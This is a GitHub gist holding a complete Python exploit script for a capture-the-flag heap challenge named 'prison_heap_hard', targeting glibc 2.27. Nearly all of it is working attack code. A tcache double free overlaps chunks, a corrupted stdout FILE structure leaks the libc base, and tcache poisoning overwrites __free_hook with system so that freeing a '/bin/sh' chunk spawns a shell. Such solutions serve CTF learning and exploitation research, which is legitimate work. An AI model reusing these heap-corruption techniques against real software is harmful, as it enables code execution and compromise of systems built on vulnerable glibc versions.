@ptr-yudai
Created April 12, 2020 22:04
prison heap hard
from ptrlib import *
def new(size, data):
    """Drive the target's menu to allocate one chunk.

    Selects option "1" once the "Exit" prompt has been seen, then answers the
    two follow-up prompts with ``size`` and ``data`` in that order. ``sock`` is
    the module-level Process handle created by the caller.
    """
    sock.sendlineafter("Exit\n", "1")
    # Each prompt line is consumed with recvline() before its answer is sent.
    for answer in (str(size), data):
        sock.recvline()
        sock.sendline(answer)
def delete(index):
    """Drive the target's menu to free the chunk numbered ``index``.

    Selects option "2" at the "Exit" prompt, discards the follow-up prompt
    line and sends the index. ``sock`` is the module-level Process handle.
    """
    menu_choice = "2"
    sock.sendlineafter("Exit\n", menu_choice)
    _ = sock.recvline()  # prompt text is not needed, only consumed
    sock.sendline(str(index))
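# Symbol offsets below come from this exact libc build (glibc 2.27); the
# script is not portable to other versions. NOTE: the repeated frees this
# script depends on are detected by the tcache double-free check that later
# glibc releases (2.29+) added.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

# The leak step is probabilistic (see "good luck" below), so the whole
# interaction is restarted against a fresh process until the leaked address
# passes the sanity check.
while True:
    sock = Process("./prison_heap_hard")

    # prepare chunks
    new(0x28, "0")   # chunk for double free
    new(0x18, "1")   # chunk for overlap
    new(0x428, "2")  # chunk linked into unsorted bin
    new(0x18, "3")   # avoid consolidation
    delete(2)

    # overlap chunks
    delete(1)
    delete(1)
    new(0x18, "\xb0")  # linked to chunk 2
    delete(0)
    delete(0)
    new(0x28, "\xb0")  # linked to chunk 2

    # fake fd
    new(0x18, "6")
    new(0x28, "7")
    new(0x18, "\x60\xd7")  # good luck :)
    new(0x28, "9")

    # leak libc address
    payload = p64(0xfbad1800)
    payload += p64(0) * 3
    payload += b'\x88'
    try:
        new(0x28, payload)
        libc_base = u64(sock.recvline()[:8]) - libc.symbol('_IO_2_1_stdout_') - 0x83
        logger.info("libc = " + hex(libc_base))
        # Explicit check rather than `assert` so it is not stripped under
        # `python -O`; a value outside the user-space range means the guess
        # above failed and this attempt must be thrown away.
        if not (0 < libc_base < 0x800000000000):
            raise ValueError("leaked address out of range: " + hex(libc_base))
    except Exception:
        # Catch ordinary errors only. The original bare `except:` also
        # swallowed KeyboardInterrupt/SystemExit, making the retry loop
        # impossible to interrupt.
        logger.warn("Bad luck!")
        sock.close()
        continue

    # tcache poisoning
    sock.sendline("1")  # recvuntil won't work here ;)
    sock.sendlineafter("heap\n", str(0x38))
    sock.sendlineafter("prison", "11")
    delete(11)
    delete(11)
    new(0x38, p64(libc_base + libc.symbol('__free_hook')))
    new(0x38, "/bin/sh\0")
    new(0x38, p64(libc_base + libc.symbol('system')))

    # get the shell
    delete(13)
    sock.recv()
    sock.interactive()
    break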